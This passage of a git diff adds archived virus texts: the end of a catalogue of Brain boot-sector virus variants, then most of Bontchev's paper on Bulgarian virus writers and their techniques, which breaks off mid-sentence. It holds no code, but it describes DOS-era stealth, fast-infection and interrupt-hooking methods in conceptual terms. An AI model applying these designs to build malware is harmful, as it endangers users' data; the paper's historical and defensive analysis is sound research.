of +the brothers, wrote the virus so that it would infect +machines running bootleg copies of a program he was +selling for physicians. The original Brain put a +copyright notice in the directory of floppy disks, but +did no other damage. + +The Brain is a boot sector infector, approximately 3 K +in length, that infects 5 1/4" floppies. It cannot +infect hard disks. It will infect a diskette whenever +the diskette is referenced. For example, a Directory +command, executing a program from the diskette, copying +a file from or to the diskette or any other access will +cause the infection to occur. The virus stores the +original boot sector, and six extension sectors, +containing the main body of the virus, in available +sectors which are then flagged as bad sectors. +Diskettes have 3K of bad sectors (the normal numbers +are none at all, or 5K, or sometimes more). + +No known intentional damage. Unintentional damage: it +slows down diskette accesses and causes time-outs, +which can make some diskette drives unusable. + +The virus is able to hide from detection by +intercepting any interrupt that might interrogate the +boot sector and re-directing the read to the original +boot sector. Thus, programs like the Norton Utilities +will be unable to see the virus. + +Infected diskettes are noticeable by "@BRAIN" or "(c) +BRAIN" displayed in the volume label. + + + + Brain-B + +Synonyms: Brain-HD, the Hard Disk Brain, Houston Virus. + +This virus is identical in every respect to the +original Brain, with the single exception that it can +infect the C drive. + + + + Brain-C + +This virus is the Brain-B that has the volume label +code removed. The volume label of infected diskettes +does not change with this virus. This virus was +difficult to detect since it does nothing overt in the +system. + + + + Clone Virus + +This virus is the Brain-C that saves the original boot +copyright label and restores it to the infected boot. +The Basit & [A]mjad original Brain messages have been +replaced with non-printable garbage that looks like +instructions if viewed through Norton or other utility. +Even if the system is booted from a clean diskette, it +is virtually impossible to tell, by visual inspection, +whether the hard disk is infected. + + + + Shoe_virus + +Synonym: UIUC Virus. + +This virus is the Brain-B virus that has been modified +to include the message - "VIRUS_SHOE RECORD, v9.0. +Dedicated to the dynamic memories of millions of virus +who are no longer with us today". The message is never +displayed. + +This might be identified with the Ashar vrus, as there +is a VIRUS_SHOES RECORD v9.0 with the identifying +string "ashar" at offset 04a6hex. + + + + Shoe_virus-B + +Experts disagree on the classification of this. + +@BULLET = It may be the Shoe_Virus that has been +modified to so that it can no longer infect hard disks. +The v9.0 has been changed to v9.1. + +@BULLET = There is a version of Brain with VIRUS_SHOE +RECORD v9.0 which is incapable of activating a virus +stored on hard disk due to the drive number being +hardwired into the read routine for loading the virus. +v9.1 may be the hard disk variant of Brain. + + + + Clone-B + +This is the Clone virus that has been modified to +corrupt the FAT when it is booted after May 5, 1992. +There are no other apparent modifications. + + + + Jork Virus + +This virus is the Shoe_virus with the identifying text +at offset 0010hex reduced to "Welcome to the Dungeon +(c) 1986 Brain", with the text at 0202hex reading "(c) +1986 Jork & Amjads (pvt) Ltd". + + + + Terse Shoe Virus + +This is a variant of the Shoe-virus with the initial +text message truncated to a single line. + +end of text. Prepared 12/7/89 + \ No newline at end of file diff --git a/textfiles.com/virus/bulgfact.txt b/textfiles.com/virus/bulgfact.txt new file mode 100644 index 00000000..a60ec727 --- /dev/null +++ b/textfiles.com/virus/bulgfact.txt @@ -0,0 +1,2212 @@ + + + The Bulgarian and Soviet Virus Factories + + ======================================== + + + + Vesselin Bontchev, Director + + Laboratory of Computer Virology + + Bulgarian Academy of Sciences, Sofia, Bulgaria + + + + + +0) Abstract + +=========== + + + +It is now well known that Bulgaria is leader in computer virus + +production and the USSR is following closely. This paper tries to + +answer the main questions: Who makes viruses there, What viruses are + +made, and Why this is done. It also underlines the impact of this + +process on the West, as well as on the national software industry. + + + +1) How the story began + +====================== + + + +Just three years ago there were no computer viruses in Bulgaria. + +After all, these were things that can happen only in the capitalist + +countries. They were first mentioned in the April issue of the + +Bulgarian computer magazine "Komputar za vas" ("Computer for you") + +[KV88] in a paper, translated from the German magazine "Chip" [Chip]. + +Soon after that, the same Bulgarian magazine published an article + +[KV89]], explaining why computer viruses cannot be dangerous. The + +arguments presented were, in general, correct, but the author had + +completely missed the fact that the majority of PC users are not + +experienced programmers. + + + +A few months later, in the fall of the same year, two men came in the + +editor's office of the magazine and claimed that they have found a + +computer virus. Careful examination showed that it was the VIENNA + +virus. + + + +At that time the computer virus was a completely new idea for us. To + +make a computer program, whose performance resembles a live being, is + +able to replicate and to move from computer to computer even against + +the will of the user, seemed extremely exciting. + + + +The fact that "it can be done" and that even "it had been done" + +spread in our country like wildfire. Soon hackers obtained a copy of + +the virus and began to hack it. It was noticed that the program + +contains no "black magic" and that it was even quite sloppily + +written. Soon new, home--made and improved versions appeared. Some of + +them were produced just by assembling the disassembly of the virus + +using a better optimizing assembler. Some were optimized by hand. As + +a result, now there are several versions of this virus, that were + +created in Bulgaria --- versions with infective lengths of 627, 623, + +622, 435, 367, 353 and even 348 bytes. The virus has been made almost + +two times shorter (its original infective length is 648 bytes) + +without any loss of functionality. + + + +This virus was the first case. Soon after that, we were "visited" by + +the CASCADE and the PING PONG viruses. The later was the first + +boot--sector virus and proved that this special area, present on + +every diskette can be used as a virus carrier, too. All these three + +viruses were probably imported with illegal copies of pirated + +programs. + + + +2) Who, What & Why. + +=================== + + + +2.1) The first Bulgarian virus. + +------------------------------- + + + +At that time both known viruses that infected files ( VIENNA and + +CASCADE) infected only COM files. This made me believe that the + +infection of EXE files was much more difficult. Unfortunately, I made + +the mistake by telling my opinion to a friend of mine. Let's call him + +"V.B." for privacy reasons.(1) + +................................................................... + +[(1) These are the initials of his true name. It + +will be the same with the other virus writers that I shall mention. + +Please note, that while I have the same initials (and even his full + +name resembles mine), we are two different persons.] + +................................................................... + +The challenge was taken immediately and soon after that I received a + +simple virus that was able to infect only EXE files. It is now known + +to the world under the name of OLD YANKEE. The reason for this is + +that when the virus infects a new file, it plays the "Yankee Doodle" + +melody. + + + +The virus itself was quite trivial. Its only feature was its ability + +to infect EXE files. The author of this virus even distributed its + +source code (or, more exactly, the source code of the program that + +releases it). Nevertheless, the virus did not spread very widely and + +even had not been modified a lot. Only a few sites reported to be + +infected by it. Probably the reason for this was the fact, that the + +virus was non--resident and that it infected files only on the + +current drive. So the only possibility to get infected by it was to + +copy an infected file from one computer to another. + + + +When the puzzle of creating a virus which is able to infect EXE files + +was solved, V.B. lost his interest in this field and didn't write any + +other viruses. As far as I know, he currently works in real--time + +signal processing. + + + +2.2) The T.P. case. + +------------------- + + + +The second Bulgarian virus--writer, T.P., caused much more trouble. + +When he first heard the idea about aself--replicating program, he was + + very interested, decided to writehis own virus, and he succeeded. + +Then he tried to implement a virus protection scheme and succeeded + +again. The next move was to improve his virus to bypass his own virus + +protection, then to improve the virus protection and so on. That is + +why there are currently about 50 different versions of his viruses. + + + +Unfortunately, several of them (about a dozen) were quite + +"successful." They spread world--wide. There are reports about them + +from all countries of the former Eastern block, as well as from the + +USA and West Europe. + + + +Earlier versions of these TP viruses are known under the name + +VACSINA, because they contain such a string. In fact, this is the + +name of the virus author's virus protection program. It is + +implemented as a device driver with this name. The virus merely tries + +to open a file with this name, which means "Hey, it's me, let me + +pass." + + + +The latest versions of the virus are best known under the name YANKEE + +DOODLE, because they play this tune. The conditions on which the tune + +is played are different with the different versions of the virus --- + +for instance when the user tries to reboot the system, or when the + +system timer reaches 5 p.m. + + + +All TP viruses are strictly non--destructive. Their author payed + +particular attention not to destroy any data. For instance, the virus + +does not infect EXE files for which the true file length and the + +length of the loadable part as it is present in the EXE header, are + +not equal. As far as I know, no other virus that is able to infect + +EXE files works this way. + + + +Also, the virus does not try to bypass the resident programs that + +have intercepted INT 13h, therefore it takes the risk to be detected + +by most virus activities monitoring software. The author of the virus + +obviously could circumvent it --- for instance it uses a clever + +technique, now known as "interrupt tracing" to bypass all programs + +that have hooked INT 21h. The only reason for not bypassing INT 13h + +as well, is that this would also bypass all disk casheing programs, + +thus it could cause damage. + + + +Of course, the fact that the virus is not intentionally destructive + +does not mean that it does not cause any damage. There are several + +reports of incompatibilities with other software; or of panicking + +users, that have formatted their disks; or, at least, damage caused + +by time loss, denial of computer services, or expenses removing the + +virus. It is well known, that "there ain't no such thing as a good + +virus." + + + +The TP viruses were not spread intentionally; the cause could be + +called "criminal negligence." The computer used by T.P. to develope + +his viruses was also shared by several other people. This is common + +practice in Bulgaria, where not everyone can have a really "personal" + +computer to work with. T.P. warned the other users that he is writing + +viruses, but at this time computer viruses were a completely new + +idea, so nobody took the warning seriously. Since T.P. didn't bother + +to clean up after himself, these users got, of course, infected. + +Unintentionally, they spread the infection further. + + + +When asked about the reason of writing viruses, T.P. replied that he + +did this in order to try several new ideas; to better learn the + +operating system and several programming tricks. He is not interested + +in this field any more --- he has stopped writing viruses about two + +years ago. + + + +2.3) The Dark Avenger. + +---------------------- + + + +In the spring of 1989 a new virus appeared in Bulgaria. It was + +obviously "home--made" and just to remove any doubts about it, there + +was a string in it, saying "This program was written in the city of + +Sofia (C) 1988-89 Dark Avenger." + + + +The virus was incredibly infectious --- when it was in memory, it was + +sufficient to copy or just to open a file to get it infected. When + +the user felt that there is a virus in his/her system and, without + +booting from a non--infected write--protected system diskette, ran an + +anti--virus program which wasn't aware of this new virus, he usually + +got all his/her executable files infected. + + + +The idea of infecting a file when it is opened was new and really + +"successful." Now such viruses are called "fast infectors." This + +strategy helped the virus to spread world-- wide. There are reports + +from all European countries, from the USA, the USSR, even from + +Thailand and Mongolia. + + + +On the top of this, the virus was very dangerously destructive. On + +each 16th run of an infected program, it overwrote a sector on a + +random place of the disk, thus possibly destroying the file or + +directory that contained this sector. The contents of the overwritten + +sector was the first 512 bytes of the virus body, so even after the + +system has been cleaned up, there were files, containing a string + +"Eddie lives...somewhere in time!" This was causing much more damage + +than if the virus was just formatting the hard disk, since the + +destruction was very unnoticable and when the user eventually + +discovered it, his backups probably already contained corrupted data. + + + +Soon after that, other clever viruses began to appear. Almost all of + +them were very destructive. Several contained completely new ideas. + +Now this person (we still cannot identify him exactly) is believed to + +be the author of the following viruses: + + + +DARK AVENGER, V2000 (two variants), V2100 (two variants), 651, + +DIAMOND (two variants), NOMENKLATURA, 512 (six variants), 800, 1226, + +PROUD, EVIL, PHOENIX, ANTHRAX, LEECH... + + + + + +Dark Avenger has several times attacked some anti--virus researchers + +personally. The V2000/V2100 viruses claim to be written by "Vesselin + +Bontchev" and in fact hang the computer when any program, containing + +this string is run. A slightly modified variant of V2100 (V2100-B) + +has been used to trojanize version 66 of John McAfee's package + +VIRUSCAN. + + + +There are reports that Dark Avenger has called several bulletin board + +systems in Europe and has uploaded there viruses. The reports come + +from the UK, Sweden, the Netherlands, Greece... Sometimes the viruses + +uploaded there are unknown in Bulgaria (NOMENKLATURA,ANTHRAX). But + +they are obviously made in our country --- they contain messages in + +Cyrillic. Sometimes Dark Avenger uploads a Trojan program that + +spreads the virus --- not just an infected program. This makes the + +detection of the source of infection more difficult. + + + +One particular case is when he has uploaded a file called UScan, + +which, when run, claims to be the "universal virus scanner," written + +by Vesselin Bontchev. Even the person who has uploaded it, has logged + +under the name "Vesselin Bontchev." In fact, the program just + +infected all scanned files with the ANTHRAX virus. + + + +While the other Bulgarian virus writers seem to be just irresponsible + +or with childish mentality, the Dark Avenger can be classified as a + +"technopath." He is a regular user of several Bulgarian bulletin + +board systems, so one can easily exchange e-mail messages with him. + +When asked why his viruses are destructive, he replied that + +"destroying data is a pleasure" and that he "just loves to destroy + +other people's work." + + + +Unfortunately, no measures can be taken against him in Bulgaria. + +Since there is no law for information protection, his activities are + +not illegal there. He can be easily caught by tapping the phones of + +the BBSes that he uses, but the law enforcement authorities cannot + +take such measures, since there is no evidence of illegal activities. + +Alas, he knows this perfectly. + + + +2.4) Lubo & Ian. + +---------------- + + + +Some of the Dark Avenger's viruses proved to be very "successful" and + +caused real epidemics. That is why they were often imitated by other + +virus writers, that had no imagination to design their own virus, but + +were jealous of Dark Avenger's fame. So they just disassembled his + +viruses (usually the first one) and used parts of it --- sometimes + +without even understanding their purpose. Such is the case with the + +MURPHY viruses. + + + +According to a string in them, they are written by "Lubo & Ian, USM + +Laboratory, Sofia." These people do exist and they have used their + +real names. "Lubo" has even been several times interviewed by + +newspaper's reporters. + + + +They claim that the virus was written for vengeance. They have done + +some important work for their boss and the latter refused to pay + +them. That is why they developed te virus in one night and released + +it. The fact that the virus will spread outside the laboratory just + +didn't come to their minds. However, this does not explain the + +developing of the other versions of the same virus (there are at + +least four variants). Nevertheless, it proves one more time that it + +is better (and safer, too) to pay the good programmers well... + + + +Besides MURPHY, these two virus writers have created another virus, + +called SENTINEL (5 variants). The only unusual thing with this virus + +is that it is written in a high--level programming language (Turbo + +PASCAL), but is not an overwriting or a companion virus as most HLL + +viruses are. It is able to infect COM and EXE files by appending + +itself to them and by preserving their full functionality. It is also + +memory resident, hides the file length increase when the user issues + +the DIR command, and even mutates. + + + +2.5) The virus writer from Plovdiv. + +----------------------------------- + + + +This man, P.D., claimed that he has written viruses "for fun" and + +only "for himself" and that he "never releases them." Unfortunately, + +at least two of them have "escaped" by accident. These are the ANTI- + +PASCAL605 and the TERROR viruses. Especially the latter is extremely + +virulent and caused a large epidemic in Bulgaria. + + + +P.D. was very sorry for that and submitted examples of all his + +viruses to the anti--virus researchers so that the respective + +anti--virus programs be developed --- just in case some of these + +viruses escapes too. These viruses turned out to be quite a few, + +ranging from extremely stupid to very sophisticated. Here are some of + +them: + + + +XBOOT, ANTIPASCAL (5 variants), TINY (11 variants), MINIMAL-45, + +TERROR, DARK LORD, NINA, GERGANA, HAPPY NEW YEAR (2 variants), INT + +13. + + + +P.D. claims that the DARK LORD virus (a minor TERROR variant) is not + +written by him. The TINY family has nothing to do with the Danish + +TINY virus (the 163--byte variant of the KENNEDY virus), and, as well + +as the MINIMAL-45 virus, are written with the only purpose to make + +the shortest virus in the world. + + + +Now P.D. is not writing viruses any more --- because "it is so easy, + +that it is not interesting," according to his own words. He is + +currently writing anti--virus programs --- and rather good ones. + + + +2.6) The two guys from Varna. + +----------------------------- + + + +They are two pupils (V.P. and S.K.) from the Mathematical High School + +in Varna (a town on the Black Sea). They have developed several + +viruses and continue to do so, producing more and more sophisticated + +ones. Furthermore, they intentionally spread their viruses, usually + +releasing them on the school's computers or in the Technical + +University in Varna. When asked why they write and release viruses, + +they reply "because it's so interesting!" + + + +The viruses written by them are: MG (5 variants), SHAKE (5 variants), + +DIR and DIR II. All of them are memory resident and infect files when + +the DIR command is performed. + + + +The last one is an extremely virulent and sophisticated virus --- as + +sophisticated, as THE NUMBER OF THE BEAST. It is also a completely + +new type of virus --- it infects nether boot sectors, nor files. + +Instead, it infects the file system as a whole, changing the + +information in the directory entries, so that each file seems to + +begin with the virus. + + + +There is a counter of the number of infected systems in the virus + +body. There is evidence that V.P. and S.K. collect infected files, + +copy the contents of the counter and then draw curves of the spread + +of infection, checking the normal distribution law. They are doing + +this "for fun." + + + +2.7) W.T.'s case. + +----------------- + + + +W.T. is a virus writer from Sofia, who has written two viruses --- + +WWT (2 variants) and DARTH VADER (4 variants). According to his own + +words, he has done so to test a new idea and to gain access to the + +Virus eXchange BBS (see below). + + + +The new idea consisted of a virus (DARTH VADER) that does not + +increase file lengths, because it searches for unused holes, filled + +with zeros, and writes itself there. Also, the virus does not perform + +any write operations. Instead, it just waits for a COM file to be + +written to by DOS and modifies the file's image in memory just before + +the write operation is performed. + + + +W.T. does not write viruses any more, but he is still extremely + +interested in this field. He is collecting sophisticated viruses and + +disassembles them, looking for clever ideas. + + + +2.8) The Naughty Hacker. + +------------------------ + + + +This virus writer, M.H., is a pupil and also lives in Sofia. He has + +written several viruses, most of which contain the string "Naughty + +Hacker" in their body. All of them are non-- destructive, but contain + +different video effects --- from display desynchronization to a + +bouncing ball. + + + +Currently, at least 8 different variants are isolated, but it is + +believed that even more exist and are spread in the wild. Also, it is + +believed that M.H. continues to produce viruses. As usual, he is + +doing so "because it is interesting" and "for fun." + + + +He is also the author of three simple boot sector viruses (BOOTHORSE + +and two others that are still unnamed). + + + +2.9) Other known virus writers. + +------------------------------- + + + +The persons listed above are the major Bulgarian virus producers. + +However, they are not alone. Several other people in Bulgaria have + +written at least one virus (sometimes more). In fact, making a virus + +is currently considered there a kind of sport, or a practical joke, + +or means of self--establishment. + + + +Some of these virus writers have supplied their creations directly to + +the anti--virus researchers, as if they are waiting for a reward. + +This happens quite often --- probably they expect that the + +anti--virus researcher, as the best qualified person, will evaluate + +their creation better. Sometimes the fact that their virus becomes + +known, is described, and is included in the best anti--virus programs + +is sufficient for these people and they don't bother to really spread + +their virus in the wild. So, probably the main reason for these + +people to produce viruses is the seek of glory, fame, and + +self--establishment. + + + +Such known Bulgarian virus writers (with the respective names of + +their viruses given in parentheses) are V.D. from Pleven (MICRO-128), + +A.S. and R.D. from Mihajlovgrad (V123), I.D. from Trojan (MUTANT, + +V127, V270x), K.D. from Tutrakan (BOYS, WARRIER, WARRIOR, DREAM), and + +others. + + + +2.10) Unknown Bulgarian virus writers. + +-------------------------------------- + + + +Of course, there are also other virus writers, that are not known to + +the author of this paper. Sometimes it is possible to determine the + +town where the viruses were developed --- usually due to an + +appropriate string in the virus body, or because the virus wasn't + +found elsewhere. Some of the viruses are very simple, others are + +quite sophisticated. Here are examples of such viruses. + + + + + +- The KAMIKAZE virus has been detected only in the Institute of + + Mathematics at the Bulgarian Academy of Sciences, Sofia and is + + probably made there; + + + +- The RAT virus, made in Sofia, as it is written in its body; + + + +- The VFSI (HAPPY DAY) virus has been developed in the Higher + + Institute of Finances and Economics in Svishtov (a small town on the + + Danube) by an unknown programmer; + + + +- The DESTRUCTOR virus, probably made in Plovdiv, where it has been + + first detected; + + + +- The PARITY virus, probably written in the Technical University, + + Sofia, since it has not been detected elsewhere; + + + +- The TONY file and boot sector viruses, probably created in Plovdiv + + where they have been first detected; + + + +- The ETC virus, detected only in Sofia; + + + +- The 1963 virus, a quite sophisticated one, probably made in the + + Sofia University; + + + +- The JUSTICE virus. + + + +2.11) The Virus eXchange BBS. + +----------------------------- + + + +About a year ago, the virus writing in Bulgaria entered a new phase. + +The virus writers began to organize themselves. The first step was + +the creation of a specialized bulletin board system (BBS), dedicated + +to virus exchange. The Virus eXchange BBS. + + + +It's system operator (SysOp), T.T. is a student of computer science + +in the Sofia University. He has established the BBS in his own home. + +On this BBS, there are two major kinds of files --- anti--virus + +programs and viruses. The anti--virus programs can be downloaded + +freely. + + + +In order to get access to the virus area, one has to upload there a + +new virus. However, anyone who uploads a new virus, gets access to + +the whole virus collection. S/He could then download every virus that + +is already available, or even all of them. No questions are asked --- + +for instance for what reason s/he might need these viruses. + + + +Furthermore, the SysOp takes no steps to verify the identity of his + +users. They are allowed to use fake names and are even encouraged to + +do so. Dark Avenger and W.T., between them are, the most active + +users, but there are also names like George Bush from New York, + +Saddam Hussein from Baghdad, Ozzy Ozburn and others. + + + +Since this BBS has already a large collection of computer viruses + +(about 300), it is quite difficult to find a new virus for it. If one + +wants badly to get access to the virus area, it is much simpler to + +write a new virus, instead of trying to find a new one. That is + +exactly what W.T. did. Therefore, this BBS encourages virus writing. + + + +Furthermore, on this BBS there are all kinds of viruses --- some of + +them as 1260, V2P6Z, FLIP, WHALE are considered as extremely + +dangerous, since they are using several new ideas and clever tricks, + +which makes them very difficult to be recognized and removed from the + +infected files. And the Virus eXchange BBS policy makes all these + +viruses freely available to any hacker that bothers to download them. + +This will, undoubtedly, lead to the creation of more and more such + +"difficult" viruses in the near future. + + + +The free availability of live viruses has already given its bitter + +fruits. It helped to viruses created far away from Bulgaria and not + +widely spread, to cause epidemics in our country. Such was the case + +of the DATALOCK virus. It has been created in California, USA and + +uploaded to the Virus eXchange BBS. A few weeks later it was detected + +in the Technical University, Sofia. Probably one of the users of the + +BBS had downloaded it from there and spread it "for fun." In the + +similar way the INTERNAL, TYPO and 1575 viruses entered our country. + + + +But the free availability of known live viruses is not the most + +dangerous thing. After all, since they are already known, there + +already exist programs to detect and probably to remove them. Much + +more dangerous is the free availability on this BBS of virus source + +code! Indeed, original source code or well commented virus + +disassemblies of several viruses are freely available on the Virus + +eXchange BBS --- just as any other live virus. To name a few, there + +are: + + + +DARK AVENGER, OLD YANKEE, DIAMOND, AMSTRAD, HYMN, MLTI830, MURPHY, + +MAGNITOGORSK, ICELANDIC, MIX1, STONED, JERUSALEM, DATACRIME, BURGER, + +ARMAGEDON, OROPAX, DARTH VADER, NAUGHTY HACKER, 512, VIENNA, 4096, + +FISH#6, PING PONG, BLACK JEC, WWT, MG, TSD, BOOTHORSE, BAD BOY, + +LEECH... + + + +Most of them are perfectly assemblable sources. + + + +The publishing of virus source code has proven to be the most + +dangerous thing in this field. The VIENNA, JERUSALEM, CASCADE and + +AMSTRAD viruses are the best examples. Their source code has been + +made publicly available, which led to the creation of scores of new + +variants of these viruses. The known variants of only these four + +viruses are about 20 % of all known viruses, which means more than a + +hundred variants. One can imagine the consequences of making publicly + +available the source code of all the viruses listed above. In less + +than a year we probably will be submerged by thousands new + +variants... + + + +In fact, this process has already begun. The HIV, MIGRAM, KAMASYA, + +CEMETERY and ANTICHRIST viruses have been obviously created by + +someone who had access to the source of the MURPHY virus. The ENIGMA + +virus is clearly based on the OLD YANKEE code. There have been + +reports about infections with these viruses in one Italian school and + +an Italian virus writer, known as Cracker Jack is a user of Virus + +eXchange... + + + +The damage caused by this BBS alone to the rest of the world is big + +enough. But this is not all. Since possession of "viral knowledge" + +(i.e., live viruses, virus source code) has always tempted hackers + +and since the legitimate anti--virus researchers usually exchange + +such things only between themselves and in a very restricted manner, + +it is not surprising that similar "virus boards" began to pop up + +around the world. There are currently such BBSes in the USA, Germany, + +Italy, Sweden, Czechoslovakia, the UK and the Soviet Union. Stopping + +their activities is very difficult in legal terms, because the + +possession, storage or willful downloading of computer viruses + +usually is not considered as a criminal offence. And it shouldn't be + +--- otherwise the anti--virus researchers themselves will not have a + +way to exchange virus samples to work with. + + + +The creation of a virus--oriented BBS, the system operator of which + +supported the writing, spreading and exchanging of virus code didn't + +go unnoticed in Bulgaria. Almost all virus writers have obtained a + +modem (a not very easy thing in Bulgaria) and contacted it. + +Afterwards, they began to contact each other by means of electronic + +messages on this BBS. They have even created a specialized local + +conference (local for Bulgaria), in order to keep in touch and to + +exchange ideas how to write clever viruses. Therefore, they began to + +organize themselves --- a thing that cannot be said about the + +anti--virus research community in all countries... + + + +3) New ideas. + +============= + + + +As it can be seen from the examples above, the whole of Bulgaria has + +turned into some kind of computer virus developing laboratory, where + +any capable (or not so capable) pupil/student/ programmer is tempted + +to write his own virus and to test it in the wild. It is not + +therefore unusual that several completely new ideas were first + +developed in our country. I shall try to enumerate here some (only + +the most important) of them. + + + + + +- The interrupt tracing technique, capable of finding the original + + handler (in DOS or BIOS) of any interrupt vector, has been first + + implemented in the YANKEE DOODLE (TP) viruses. Later other viruses in + + the world began to use it (4096, NAUGHTY HACKER). + + + +- The "fast infectors" --- viruses that infect on file opening or + + even on any file operation were first developed in Bulgaria. The + + first such virus was the DARK AVENGER. Now there are a lot of fast + + infectors. One of them --- 1963 --- even infects on file deletion. + + + +- The "semi--stealth" viruses --- viruses that hide the increasing of + + the size of the infected files (the 651 virus) or that remove them + + from the inflected files when one loads them with a debugger (YANKEE + + DOODLE) both are viruses, made in our country. + + + +- Hiding the true file length usually causes problems, because CHKDSK + + is able to detect the difference between the disk space marked as + + used in the FAT and the reported file length. Only two Bulgarian + + viruses in the world are able to handle this problem --- DIAMOND and + + V2100. + + + +- The first really "stealth" file infector --- the 512 virus was + + Bulgarian. It is true however, that the idea has been discovered + + independently almost at the same time in other parts of the world + + (the 4096 virus from Israel). + + + +- The only known stealth parasitic virus, which "stealthy" features + + go down to the BIOS level (i.e., it cannot be detected if active in + + memory even if the infected file is read at sector and not at file + + level) is the Bulgarian INT13 virus. + + + +- One of the first multi--partite viruses (viruses that are able to + + infect both files and boot sectors) --- the ANTHRAX virus, has been + + developed in Bulgaria. It is true, however, that similar ideas can be + + noticed in the 4096 and GHOST BALLS viruses, which are developed much + + earlier. Also, other multi--partite viruses (VIRUS-101, V-1, FLIP, + + INVADER) were created independently almost at the same time (and even + + earlier) in other parts of the world. + + + +- The idea first used in the LEHIGH virus --- to place the virus body + + in an unused part of the file COMMAND.COM has been further developed + + by several Bulgarian viruses. They all can infect any COM or EXE file + + (unlike the LEHIGH virus) in the usual way, but when they are + + infecting the command interpreter, they place themselves in an area + + filled with zeros at the end of the file and thus in this case they + + do not increase its length. Such viruses are TERROR, NAUGHTY HACKER + + and others. + + + +- The method, mentioned above has been developed even further by + + other Bulgarian viruses. They have noticed that any sufficiently + + large area of zeros in any file (not just COMMAND.COM) can be used to + + hide the virus body. The viruses that use this method are again of + + Bulgarian origin --- PROUD, EVIL, PHOENIX, RAT, DARTH VADER... The + + latter even does not write to the infected files --- it leaves this + + task to DOS. And the RAT virus hides itself into the unused part of + + the EXE file headers. + + + +- One of the extremely mutating viruses is the Dark Avenger's virus + + LEECH. It can exist in more than 4.5 billion variants. It is true, + + however, that this is neither the first entirely mutating virus (1260 + + being the first), nor it has the most flexible mutating mechanism (it + + is much simpler than V2P6Z). + + + +- A completely new type of computer virus (DIR II) has been developed + + by two Bulgarian pupils. This virus does not infect neither files, + + nor boot sectors. Instead, it infects file systems as a whole, or + + more exactly --- directory entries. + + + +- Different tricks to get control without directly hooking the INT + + 21h vector were developed by several Bulgarian virus writers. The + + TERROR virus places a JMP instruction to its body in the original INT + + 21h handler in DOS. The viruses from the PHOENIX family ( 800, 1226, + + PROUD, EVIL, PHOENIX) hook an interrupt that is called by DOS on + + every file--related function (INT 2Ah, AH=82h). The DIR II virus + + patches itself in the chain of DOS disk device drivers. + + + +- The first virus, that is able to infect device drivers (SYS files + + only), is, of course, Bulgarian. This is the HAPPY NEW YEAR ( 1600) + + virus. + + + +- The first fully functional parasitic virus, written entirely in a + + high level language (Turbo PASCAL) is the Bulgarian virus SENTINEL. + + + +- The Bulgarian virus ANTHRAX is the first virus that is resident in + + memory only temporary. It removes itself from there after it has + + infected the first file and then acts as a non--resident virus. + + + +- The shortest memory resident virus in the IBM PC world --- only 128 + + bytes --- is again developed in Bulgaria. There are reports about a + + 108--byte resident virus, also from there, but they are unconfirmed + + yet. + + + +- The shortest virus in the IBM PC world --- only 45 bytes long, is + + the Bulgarian virus MINIMAL-45. It seems possible, however, to + + shorten it even further --- up to 31 bytes, with a big loss of + + reliability. + + + +4) Why so many viruses are created in Bulgaria. + +=============================================== + + + +Computer viruses are created in all parts of the world, not only in + +Bulgaria. However, the portion of them that are created in our + +country is extremely high. Therefore, in the whole world there exist + +preconditions that make virus writing tempting, but in Bulgaria there + +exist specific conditions as well. + + + +4.1) Specific reasons for virus writing in Bulgaria. + +---------------------------------------------------- + + + +4.1.1) + + + +The first, and most important of all is the existence of a + +huge army of young and extremely qualified people, computer wizards, + +that are not actively involved in the economic life. + + + +The computerization in Bulgaria began without economical reasons. + +Since our country was a socialist one, its economics was of + +administrative type. The economics didn't need to be computerized. In + +fact, computers and planned economics are quite incompatible --- + +computers help you to produce more in less time and with less effort + +and money, while the goal of a manager in a planned economics is to + +fulfil the plan exactly as it is given --- for no more and no less + +time, and with no more and no less money. However, the communist + +party leaders in Bulgaria decided that we should computerize --- + +mainly to be able to supply computers to the Soviet Union and + +circumvent the embargo. + + + +While computerization in itself is not a bad thing, we made a very + +severe mistake. Bulgarian economics was very weak (now it is even + +weaker), but we had quite a lot skilled people. Therefore, we should + +not have tried to produce hardware while we had good chances in the + +software industry, where mainly "brainware" is required. However, + +Bulgaria did just the opposite. Instead of buying the hardware, we + +began to produce it (mainly illegal Apple and IBM clones). Instead of + +producing our own software and to try to sell it in the West, we + +began to steal Western computer programs, to change some copyright + +notices in them, and to re--sell them (mainly in Bulgaria, in the + +Soviet Union, and in the other countries of the former Eastern + +block). + + + +At that time most Western software was copy protected. Instead of + +training our skilled people in writing their own programs, we began + +to train them to break copy protection schemes. And they achieved + +great success in this field. The Bulgarian hackers are maybe the best + +in cracking copy protected programs. Besides, they had no real hope + +in making and selling their own programs, since, due to the total + +lack of copyright law on computer software, it was impossible to sell + +more than two or three examples of a computer program in Bulgaria. + +The rest were copied. + + + +Since the introduction of computers in the Bulgarian offices was not + +a natural process, but due to an administrative order, very often + +these computers were not used --- they were only considered as an + +object of prestige. Very often on the desk of a company director, + +near the phone, stood a personal computer. The director himself + +almost never used the computer --- however sometimes his/her children + +came to the office to use it --- to play games or to investigate its + +internals. While the price of personal computers in Bulgaria was too + +high to permit a private person to have his/her own computer, it was + +a common practice to use the computer at the office for personal + +reasons. At the same time, the computer education was very widely + +introduced in Bulgaria. Everyone was educated in this field --- from + +children in the kindergartens to old teachers that had just a few + +years until pension. Since this kind of science is better + +comprehended by younger brains, it is no wonder that the people, who + +became most skilled in this field, were very young. Very young and + +not morally grown--up. We spent a lot of effort teaching these people + +how to program, but forgot to educate them in computer ethics. + +Besides, the lack of respect to the others' work is a common problem + +in the socialist societies. + + + +4.1.2) + + + +The second main reason is the wide--spread practice of software + +pirating (which was, in fact, a kind of state policy) and the very + +low payment of the average programmers. + + + +As was mentioned above, Bulgaria took the wrong decision in producing + +computers and stealing programs. There is still no copyright law, + +concerning computer software there. Because of this, the software + +piracy was an extremely widespread practice. In fact, almost all + +software products used were illegal copies. Most people using them + +have never seen the original diskettes or original documentation. + +Very often there was no documentation at all. + + + +Since all kinds of programs (from games to desktop publishing + +systems) were copied very often, this greatly helped for the spread + +of computer viruses. + + + +At the same time, the work of the average programmer was evaluated + +very low --- there were almost no chances to sell his/her software + +products. Even now, a programmer in Bulgaria is paid 100 to 120 times + +less than the programmer with the same qualification in the USA. + + + +This caused several young people to become embittered against the + +society that was unable to evaluate them as it should. There is only + +one step in the transformation of these young people into creators of + +destructive viruses. Some of them (e.g., the Dark Avenger) took this + +step. + + + +4.1.3) + + + +The third major reason is the total lack of legislative against + +creation and willful distribution of computer viruses and against + +illegal access and modification of computer information in general. + + + + + +Because of the lack of copyright laws on computer software, there is + +no such thing as ownership of computer information in Bulgaria. + +Therefore, the modification or even the destruction of computer + 